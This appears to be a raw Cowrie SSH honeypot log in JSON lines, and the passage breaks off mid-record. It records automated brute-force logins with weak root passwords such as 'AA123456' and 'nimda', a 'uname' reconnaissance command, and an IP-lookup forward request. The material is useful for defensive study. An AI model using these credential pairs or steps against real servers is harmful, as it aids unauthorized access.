{"eventid":"cowrie.session.connect","src_ip":"212.227.125.160","src_port":35234,"dst_ip":"1.2.3.4","dst_port":22,"session":"14f0d6a434a6","protocol":"ssh","message":"New connection: 212.227.125.160:35234 (1.2.3.4:22) [session: 14f0d6a434a6]","sensor":"my-vps","timestamp":"2025-08-31T04:50:16.389768Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-31T04:50:16.811900Z","src_ip":"212.227.125.160","session":"14f0d6a434a6"}
{"eventid":"cowrie.client.kex","hassh":"2ec37a7cc8daf20b10e1ad6221061ca5","hasshAlgorithms":"curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group-exchange-sha256,diffie-hellman-group-exchange-sha1,diffie-hellman-group16-sha512,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,diffie-hellman-group1-sha1,ext-info-c,kex-strict-c-v00@openssh.com;aes128-ctr,aes192-ctr,aes256-ctr,aes128-gcm@openssh.com,aes256-gcm@openssh.com,chacha20-poly1305@openssh.com,arcfour256,arcfour128,arcfour,3des-cbc,aes128-cbc;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group-exchange-sha256","diffie-hellman-group-exchange-sha1","diffie-hellman-group16-sha512","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","diffie-hellman-group1-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-rsa","rsa-sha2-256","rsa-sha2-512","ssh-dss","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","ssh-ed25519"],"encCS":["aes128-ctr","aes192-ctr","aes256-ctr","aes128-gcm@openssh.com","aes256-gcm@openssh.com","chacha20-poly1305@openssh.com","arcfour256","arcfour128","arcfour","3des-cbc","aes128-cbc"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 2ec37a7cc8daf20b10e1ad6221061ca5","sensor":"my-vps","timestamp":"2025-08-31T04:50:16.812839Z","src_ip":"212.227.125.160","session":"14f0d6a434a6"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":46514,"dst_ip":"1.2.3.4","dst_port":22,"session":"92a648327ace","protocol":"ssh","message":"New connection: 212.227.235.229:46514 (1.2.3.4:22) [session: 92a648327ace]","sensor":"my-vps","timestamp":"2025-08-31T04:50:17.397196Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-AsyncSSH_2.1.0","message":"Remote SSH version: SSH-2.0-AsyncSSH_2.1.0","sensor":"my-vps","timestamp":"2025-08-31T04:50:17.416445Z","src_ip":"212.227.235.229","session":"92a648327ace"}
{"eventid":"cowrie.log.closed","ttylog":"var/lib/cowrie/tty/7ab552f01de999cb12092166cdc36fd68a0edbb33927e0ef3d26f4ee6449f804","size":70,"shasum":"7ab552f01de999cb12092166cdc36fd68a0edbb33927e0ef3d26f4ee6449f804","duplicate":true,"duration":"2.8","message":"Closing TTY Log: var/lib/cowrie/tty/7ab552f01de999cb12092166cdc36fd68a0edbb33927e0ef3d26f4ee6449f804 after 2.8 seconds","sensor":"my-vps","timestamp":"2025-08-31T04:50:17.576230Z","src_ip":"212.227.235.229","session":"858adba2cf12"}
{"eventid":"cowrie.session.closed","duration":"13.3","message":"Connection lost after 13.3 seconds","sensor":"my-vps","timestamp":"2025-08-31T04:50:17.577284Z","src_ip":"212.227.235.229","session":"858adba2cf12"}
{"eventid":"cowrie.client.kex","hassh":"fda360b1b4f4d3455cb75c6e7edb1d11","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,curve448-sha512,ecdh-sha2-nistp521,ecdh-sha2-nistp384,ecdh-sha2-nistp256,ecdh-sha2-1.3.132.0.10,diffie-hellman-group-exchange-sha256,diffie-hellman-group-exchange-sha1,diffie-hellman-group14-sha256,diffie-hellman-group15-sha512,diffie-hellman-group16-sha512,diffie-hellman-group17-sha512,diffie-hellman-group18-sha512,diffie-hellman-group14-sha1,diffie-hellman-group1-sha1,rsa2048-sha256,rsa1024-sha1,ext-info-c;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr,aes256-cbc,aes192-cbc,aes128-cbc,3des-cbc,blowfish-cbc,cast128-cbc,arcfour256,arcfour128,arcfour;umac-64-etm@openssh.com,umac-128-etm@openssh.com,hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha1-etm@openssh.com,hmac-md5-etm@openssh.com,hmac-sha2-256-96-etm@openssh.com,hmac-sha2-512-96-etm@openssh.com,hmac-sha1-96-etm@openssh.com,hmac-md5-96-etm@openssh.com,umac-64@openssh.com,umac-128@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-md5,hmac-sha2-256-96,hmac-sha2-512-96,hmac-sha1-96,hmac-md5-96;zlib@openssh.com,zlib,none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","curve448-sha512","ecdh-sha2-nistp521","ecdh-sha2-nistp384","ecdh-sha2-nistp256","ecdh-sha2-1.3.132.0.10","diffie-hellman-group-exchange-sha256","diffie-hellman-group-exchange-sha1","diffie-hellman-group14-sha256","diffie-hellman-group15-sha512","diffie-hellman-group16-sha512","diffie-hellman-group17-sha512","diffie-hellman-group18-sha512","diffie-hellman-group14-sha1","diffie-hellman-group1-sha1","rsa2048-sha256","rsa1024-sha1","ext-info-c"],"keyAlgs":["ssh-ed25519-cert-v01@openssh.com","ssh-ed448-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-1.3.132.0.10-cert-v01@openssh.com","ssh-rsa-cert-v01@openssh.com","ssh-dss-cert-v01@openssh.com","ssh-ed25519","ssh-ed448","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","ecdsa-sha2-1.3.132.0.10","rsa-sha2-256","rsa-sha2-512","ssh-rsa","ssh-dss"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr","aes256-cbc","aes192-cbc","aes128-cbc","3des-cbc","blowfish-cbc","cast128-cbc","arcfour256","arcfour128","arcfour"],"macCS":["umac-64-etm@openssh.com","umac-128-etm@openssh.com","hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha1-etm@openssh.com","hmac-md5-etm@openssh.com","hmac-sha2-256-96-etm@openssh.com","hmac-sha2-512-96-etm@openssh.com","hmac-sha1-96-etm@openssh.com","hmac-md5-96-etm@openssh.com","umac-64@openssh.com","umac-128@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-md5","hmac-sha2-256-96","hmac-sha2-512-96","hmac-sha1-96","hmac-md5-96"],"compCS":["zlib@openssh.com","zlib","none"],"langCS":[""],"message":"SSH client hassh fingerprint: fda360b1b4f4d3455cb75c6e7edb1d11","sensor":"my-vps","timestamp":"2025-08-31T04:50:17.653224Z","src_ip":"212.227.235.229","session":"92a648327ace"}
{"eventid":"cowrie.login.failed","username":"postgres","password":"welcome","message":"login attempt [postgres/welcome] failed","sensor":"my-vps","timestamp":"2025-08-31T04:50:19.007979Z","src_ip":"212.227.125.160","session":"14f0d6a434a6"}
{"eventid":"cowrie.login.failed","username":"xbmc","password":"xbmc","message":"login attempt [xbmc/xbmc] failed","sensor":"my-vps","timestamp":"2025-08-31T04:50:19.129841Z","src_ip":"212.227.235.229","session":"92a648327ace"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.125.160","src_port":34778,"dst_ip":"1.2.3.4","dst_port":22,"session":"db364644e347","protocol":"ssh","message":"New connection: 212.227.125.160:34778 (1.2.3.4:22) [session: db364644e347]","sensor":"my-vps","timestamp":"2025-08-31T04:50:20.260655Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-31T04:50:20.261884Z","src_ip":"212.227.125.160","session":"db364644e347"}
{"eventid":"cowrie.session.closed","duration":"3.0","message":"Connection lost after 3.0 seconds","sensor":"my-vps","timestamp":"2025-08-31T04:50:20.387627Z","src_ip":"212.227.235.229","session":"92a648327ace"}
{"eventid":"cowrie.client.kex","hassh":"0a07365cc01fa9fc82608ba4019af499","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,ext-info-c,kex-strict-c-v00@openssh.com;aes128-gcm@openssh.com,aes256-gcm@openssh.com,chacha20-poly1305@openssh.com,aes128-ctr,aes192-ctr,aes256-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["rsa-sha2-256-cert-v01@openssh.com","rsa-sha2-512-cert-v01@openssh.com","ssh-rsa-cert-v01@openssh.com","ssh-dss-cert-v01@openssh.com","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519-cert-v01@openssh.com","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","rsa-sha2-256","rsa-sha2-512","ssh-rsa","ssh-dss","ssh-ed25519"],"encCS":["aes128-gcm@openssh.com","aes256-gcm@openssh.com","chacha20-poly1305@openssh.com","aes128-ctr","aes192-ctr","aes256-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 0a07365cc01fa9fc82608ba4019af499","sensor":"my-vps","timestamp":"2025-08-31T04:50:20.450586Z","src_ip":"212.227.125.160","session":"db364644e347"}
{"eventid":"cowrie.session.closed","duration":"4.2","message":"Connection lost after 4.2 seconds","sensor":"my-vps","timestamp":"2025-08-31T04:50:20.570878Z","src_ip":"212.227.125.160","session":"14f0d6a434a6"}
{"eventid":"cowrie.login.success","username":"root","password":"AA123456","message":"login attempt [root/AA123456] succeeded","sensor":"my-vps","timestamp":"2025-08-31T04:50:21.017560Z","src_ip":"212.227.125.160","session":"db364644e347"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-31T04:50:21.414311Z","src_ip":"212.227.125.160","session":"db364644e347"}
{"eventid":"cowrie.command.input","input":"uname -s -v -n -r -m","message":"CMD: uname -s -v -n -r -m","sensor":"my-vps","timestamp":"2025-08-31T04:50:21.415045Z","src_ip":"212.227.125.160","session":"db364644e347"}
{"eventid":"cowrie.log.closed","ttylog":"var/lib/cowrie/tty/7ab552f01de999cb12092166cdc36fd68a0edbb33927e0ef3d26f4ee6449f804","size":70,"shasum":"7ab552f01de999cb12092166cdc36fd68a0edbb33927e0ef3d26f4ee6449f804","duplicate":true,"duration":"0.2","message":"Closing TTY Log: var/lib/cowrie/tty/7ab552f01de999cb12092166cdc36fd68a0edbb33927e0ef3d26f4ee6449f804 after 0.2 seconds","sensor":"my-vps","timestamp":"2025-08-31T04:50:21.605675Z","src_ip":"212.227.125.160","session":"db364644e347"}
{"eventid":"cowrie.session.closed","duration":"1.3","message":"Connection lost after 1.3 seconds","sensor":"my-vps","timestamp":"2025-08-31T04:50:21.606764Z","src_ip":"212.227.125.160","session":"db364644e347"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.125.160","src_port":38146,"dst_ip":"1.2.3.4","dst_port":22,"session":"874bd4bd5c1d","protocol":"ssh","message":"New connection: 212.227.125.160:38146 (1.2.3.4:22) [session: 874bd4bd5c1d]","sensor":"my-vps","timestamp":"2025-08-31T04:50:22.345258Z"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.125.160","src_port":34830,"dst_ip":"1.2.3.4","dst_port":22,"session":"c8e52a50a38f","protocol":"ssh","message":"New connection: 212.227.125.160:34830 (1.2.3.4:22) [session: c8e52a50a38f]","sensor":"my-vps","timestamp":"2025-08-31T04:50:25.511931Z"}
{"eventid":"cowrie.session.closed","duration":"0.0","message":"Connection lost after 0.0 seconds","sensor":"my-vps","timestamp":"2025-08-31T04:50:25.514736Z","src_ip":"212.227.125.160","session":"c8e52a50a38f"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-31T04:50:27.646504Z","src_ip":"212.227.125.160","session":"874bd4bd5c1d"}
{"eventid":"cowrie.client.kex","hassh":"0a07365cc01fa9fc82608ba4019af499","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,ext-info-c,kex-strict-c-v00@openssh.com;aes128-gcm@openssh.com,aes256-gcm@openssh.com,chacha20-poly1305@openssh.com,aes128-ctr,aes192-ctr,aes256-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["rsa-sha2-256-cert-v01@openssh.com","rsa-sha2-512-cert-v01@openssh.com","ssh-rsa-cert-v01@openssh.com","ssh-dss-cert-v01@openssh.com","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519-cert-v01@openssh.com","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","rsa-sha2-256","rsa-sha2-512","ssh-rsa","ssh-dss","ssh-ed25519"],"encCS":["aes128-gcm@openssh.com","aes256-gcm@openssh.com","chacha20-poly1305@openssh.com","aes128-ctr","aes192-ctr","aes256-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 0a07365cc01fa9fc82608ba4019af499","sensor":"my-vps","timestamp":"2025-08-31T04:50:27.647184Z","src_ip":"212.227.125.160","session":"874bd4bd5c1d"}
{"eventid":"cowrie.session.connect","src_ip":"201.148.180.50","src_port":47668,"dst_ip":"1.2.3.4","dst_port":22,"session":"db476607f2ad","protocol":"ssh","message":"New connection: 201.148.180.50:47668 (1.2.3.4:22) [session: db476607f2ad]","sensor":"my-vps","timestamp":"2025-08-31T04:50:30.524364Z"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":36636,"dst_ip":"1.2.3.4","dst_port":22,"session":"14b132a8ed23","protocol":"ssh","message":"New connection: 212.227.235.229:36636 (1.2.3.4:22) [session: 14b132a8ed23]","sensor":"my-vps","timestamp":"2025-08-31T04:50:32.072486Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-AsyncSSH_2.1.0","message":"Remote SSH version: SSH-2.0-AsyncSSH_2.1.0","sensor":"my-vps","timestamp":"2025-08-31T04:50:32.110273Z","src_ip":"212.227.235.229","session":"14b132a8ed23"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-31T04:50:32.177503Z","src_ip":"201.148.180.50","session":"db476607f2ad"}
{"eventid":"cowrie.client.kex","hassh":"0a07365cc01fa9fc82608ba4019af499","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,ext-info-c,kex-strict-c-v00@openssh.com;aes128-gcm@openssh.com,aes256-gcm@openssh.com,chacha20-poly1305@openssh.com,aes128-ctr,aes192-ctr,aes256-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["rsa-sha2-256-cert-v01@openssh.com","rsa-sha2-512-cert-v01@openssh.com","ssh-rsa-cert-v01@openssh.com","ssh-dss-cert-v01@openssh.com","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519-cert-v01@openssh.com","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","rsa-sha2-256","rsa-sha2-512","ssh-rsa","ssh-dss","ssh-ed25519"],"encCS":["aes128-gcm@openssh.com","aes256-gcm@openssh.com","chacha20-poly1305@openssh.com","aes128-ctr","aes192-ctr","aes256-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 0a07365cc01fa9fc82608ba4019af499","sensor":"my-vps","timestamp":"2025-08-31T04:50:32.179373Z","src_ip":"201.148.180.50","session":"db476607f2ad"}
{"eventid":"cowrie.client.kex","hassh":"fda360b1b4f4d3455cb75c6e7edb1d11","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,curve448-sha512,ecdh-sha2-nistp521,ecdh-sha2-nistp384,ecdh-sha2-nistp256,ecdh-sha2-1.3.132.0.10,diffie-hellman-group-exchange-sha256,diffie-hellman-group-exchange-sha1,diffie-hellman-group14-sha256,diffie-hellman-group15-sha512,diffie-hellman-group16-sha512,diffie-hellman-group17-sha512,diffie-hellman-group18-sha512,diffie-hellman-group14-sha1,diffie-hellman-group1-sha1,rsa2048-sha256,rsa1024-sha1,ext-info-c;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr,aes256-cbc,aes192-cbc,aes128-cbc,3des-cbc,blowfish-cbc,cast128-cbc,arcfour256,arcfour128,arcfour;umac-64-etm@openssh.com,umac-128-etm@openssh.com,hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha1-etm@openssh.com,hmac-md5-etm@openssh.com,hmac-sha2-256-96-etm@openssh.com,hmac-sha2-512-96-etm@openssh.com,hmac-sha1-96-etm@openssh.com,hmac-md5-96-etm@openssh.com,umac-64@openssh.com,umac-128@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-md5,hmac-sha2-256-96,hmac-sha2-512-96,hmac-sha1-96,hmac-md5-96;zlib@openssh.com,zlib,none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","curve448-sha512","ecdh-sha2-nistp521","ecdh-sha2-nistp384","ecdh-sha2-nistp256","ecdh-sha2-1.3.132.0.10","diffie-hellman-group-exchange-sha256","diffie-hellman-group-exchange-sha1","diffie-hellman-group14-sha256","diffie-hellman-group15-sha512","diffie-hellman-group16-sha512","diffie-hellman-group17-sha512","diffie-hellman-group18-sha512","diffie-hellman-group14-sha1","diffie-hellman-group1-sha1","rsa2048-sha256","rsa1024-sha1","ext-info-c"],"keyAlgs":["ssh-ed25519-cert-v01@openssh.com","ssh-ed448-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-1.3.132.0.10-cert-v01@openssh.com","ssh-rsa-cert-v01@openssh.com","ssh-dss-cert-v01@openssh.com","ssh-ed25519","ssh-ed448","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","ecdsa-sha2-1.3.132.0.10","rsa-sha2-256","rsa-sha2-512","ssh-rsa","ssh-dss"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr","aes256-cbc","aes192-cbc","aes128-cbc","3des-cbc","blowfish-cbc","cast128-cbc","arcfour256","arcfour128","arcfour"],"macCS":["umac-64-etm@openssh.com","umac-128-etm@openssh.com","hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha1-etm@openssh.com","hmac-md5-etm@openssh.com","hmac-sha2-256-96-etm@openssh.com","hmac-sha2-512-96-etm@openssh.com","hmac-sha1-96-etm@openssh.com","hmac-md5-96-etm@openssh.com","umac-64@openssh.com","umac-128@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-md5","hmac-sha2-256-96","hmac-sha2-512-96","hmac-sha1-96","hmac-md5-96"],"compCS":["zlib@openssh.com","zlib","none"],"langCS":[""],"message":"SSH client hassh fingerprint: fda360b1b4f4d3455cb75c6e7edb1d11","sensor":"my-vps","timestamp":"2025-08-31T04:50:32.363413Z","src_ip":"212.227.235.229","session":"14b132a8ed23"}
{"eventid":"cowrie.login.success","username":"root","password":"nimda","message":"login attempt [root/nimda] succeeded","sensor":"my-vps","timestamp":"2025-08-31T04:50:33.933926Z","src_ip":"212.227.235.229","session":"14b132a8ed23"}
{"eventid":"cowrie.direct-tcpip.request","dst_ip":"ip-who.com","dst_port":80,"src_ip":"212.227.235.229","src_port":0,"message":"direct-tcp connection request to ip-who.com:80 from :0","sensor":"my-vps","timestamp":"2025-08-31T04:50:34.194169Z","session":"14b132a8ed23"}
{"eventid":"cowrie.direct-tcpip.data","dst_ip":"ip-who.com","dst_port":80,"data":"b'GET /json/ HTTP/1.1\\r\\nHost: ip-who.com\\r\\n\\r\\n'","id":0,"message":"discarded direct-tcp forward request 0 to ip-who.com:80 with data b'GET /json/ HTTP/1.1\\r\\nHost: ip-who.com\\r\\n\\r\\n'","sensor":"my-vps","timestamp":"2025-08-31T04:50:34.720645Z","src_ip":"212.227.235.229","session":"14b132a8ed23"}
{"eventid":"cowrie.session.closed","duration":"2.9","message":"Connection lost after 2.9 seconds","sensor":"my-vps","timestamp":"2025-08-31T04:50:34.990755Z","src_ip":"212.227.235.229","session":"14b132a8ed23"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.125.160","src_port":33480,"dst_ip":"1.2.3.4","dst_port":22,"session":"ff200e0de902","protocol":"ssh","message":"New connection: 212.227.125.160:33480 (1.2.3.4:22) [session: ff200e0de902]","sensor":"my-vps","timestamp":"2025-08-31T04:50:36.125495Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-31T04:50:36.126986Z","src_ip":"212.227.125.160","session":"ff200e0de902"}
{"eventid":"cowrie.client.kex","hassh":"0a07365cc01fa9fc82608ba4019af499","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,ext-info-c,kex-strict-c-v00@openssh.com;aes128-gcm@openssh.com,aes256-gcm@openssh.com,chacha20-poly1305@openssh.com,aes128-ctr,aes192-ctr,aes256-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["rsa-sha2-256-cert-v01@openssh.com","rsa-sha2-512-cert-v01@openssh.com","ssh-rsa-cert-v01@openssh.com","ssh-dss-cert-v01@openssh.com","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519-cert-v01@openssh.com","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","rsa-sha2-256","rsa-sha2-512","ssh-rsa","ssh-dss","ssh-ed25519"],"encCS":["aes128-gcm@openssh.com","aes256-gcm@openssh.com","chacha20-poly1305@openssh.com","aes128-ctr","aes192-ctr","aes256-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 0a07365cc01fa9fc82608ba4019af499","sensor":"my-vps","timestamp":"2025-08-31T04:50:36.310250Z","src_ip":"212.227.125.160","session":"ff200e0de902"}
{"eventid":"cowrie.login.success","username":"root","password":"Passw0rd","message":"login attempt [root/Passw0rd] succeeded","sensor":"my-vps","timestamp":"2025-08-31T04:50:36.861629Z","src_ip":"212.227.125.160","session":"ff200e0de902"}
{"eventid":"cowrie.login.success","username":"root","password":"Gr","message":"login attempt [root/Gr] succeeded","sensor":"my-vps","timestamp":"2025-08-31T04:50:37.160161Z","src_ip":"201.148.180.50","session":"db476607f2ad"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-31T04:50:37.244451Z","src_ip":"212.227.125.160","session":"ff200e0de902"}
{"eventid":"cowrie.command.input","input":"uname -s -v -n -r -m","message":"CMD: uname -s -v -n -r -m","sensor":"my-vps","timestamp":"2025-08-31T04:50:37.245175Z","src_ip":"212.227.125.160","session":"ff200e0de902"}
{"eventid":"cowrie.log.closed","ttylog":"var/lib/cowrie/tty/7ab552f01de999cb12092166cdc36fd68a0edbb33927e0ef3d26f4ee6449f804","size":70,"shasum":"7ab552f01de999cb12092166cdc36fd68a0edbb33927e0ef3d26f4ee6449f804","duplicate":true,"duration":"0.2","message":"Closing TTY Log: var/lib/cowrie/tty/7ab552f01de999cb12092166cdc36fd68a0edbb33927e0ef3d26f4ee6449f804 after 0.2 seconds","sensor":"my-vps","timestamp":"2025-08-31T04:50:37.429764Z","src_ip":"212.227.125.160","session":"ff200e0de902"}
{"eventid":"cowrie.session.closed","duration":"1.3","message":"Connection lost after 1.3 seconds","sensor":"my-vps","timestamp":"2025-08-31T04:50:37.431144Z","src_ip":"212.227.125.160","session":"ff200e0de902"}
{"eventid":"cowrie.login.success","username":"root","password":"1234567890","message":"login attempt [root/1234567890] succeeded","sensor":"my-vps","timestamp":"2025-08-31T04:50:37.825395Z","src_ip":"212.227.125.160","session":"874bd4bd5c1d"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":37764,"dst_ip":"1.2.3.4","dst_port":22,"session":"624445a1f8f7","protocol":"ssh","message":"New connection: 212.227.235.229:37764 (1.2.3.4:22) [session: 624445a1f8f7]","sensor":"my-vps","timestamp":"2025-08-31T04:50:37.860346Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh_0.11.1","message":"Remote SSH version: SSH-2.0-libssh_0.11.1","sensor":"my-vps","timestamp":"2025-08-31T04:50:37.861398Z","src_ip":"212.227.235.229","session":"624445a1f8f7"}
{"eventid":"cowrie.client.kex","hassh":"03a80b21afa810682a776a7d42e5e6fb","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group18-sha512,diffie-hellman-group16-sha512,diffie-hellman-group-exchange-sha256,diffie-hellman-group14-sha256,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512;none,zlib@openssh.com","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group18-sha512","diffie-hellman-group16-sha512","diffie-hellman-group-exchange-sha256","diffie-hellman-group14-sha256","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-ed25519","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","sk-ssh-ed25519@openssh.c